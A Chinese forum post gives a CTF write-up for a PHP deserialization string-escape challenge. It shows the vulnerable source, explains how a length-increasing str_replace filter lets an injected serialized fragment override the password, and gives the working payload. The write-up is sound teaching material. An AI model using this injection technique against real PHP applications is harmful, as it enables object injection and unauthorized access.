论坛首页 > CTF&WP专版

CTF-18解题思路

Track-子羽   ·   发表于 2021-11-17 14:51:42   ·   CTF&WP专版

源码分析:

  1. <?php
  2. highlight_file(__FILE__);
  3. error_reporting(0);
  5. class a
  6. {
  7.   public $uname;
  8.   public $password;
  9.   public function __construct($uname,$password)
  10.   {
  11.     $this->uname=$uname;
  12.     $this->password=$password;
  13.   }
  14.   public function __wakeup()
  15.   {
  16.       if($this->password==='yu22x')
  17.       {
  18.         include('flag.php');
  19.         echo $flag;  
  20.       }
  21.       else
  22.       {
  23.         echo 'wrong password';
  24.       }
  25.     }
  26.   }
  28. function filter($string){
  29.     return str_replace('Firebasky','Firebaskyup',$string);
  30. }
  32. $uname=$_GET[1];
  33. $password=1;
  34. $ser=filter(serialize(new a($uname,$password)));
  35. $test=unserialize($ser);
  36. ?>

得到flag的条件:$this->password==='yu22x'

难点是$password不可控,考查的是反序列化字符串逃逸。(https://www.cnblogs.com/NPFS/p/13338789.html)

要在参数值的结尾构造:";s:8:"password";s:5:"yu22x";}(总共是30个字符)。因为str_replace('Firebasky','Firebaskyup',$string);替换后从9个字符变为了11个,多了两个字符,因此输入15个Firebasky即可。

payload:

  1. FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-19 | 706 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.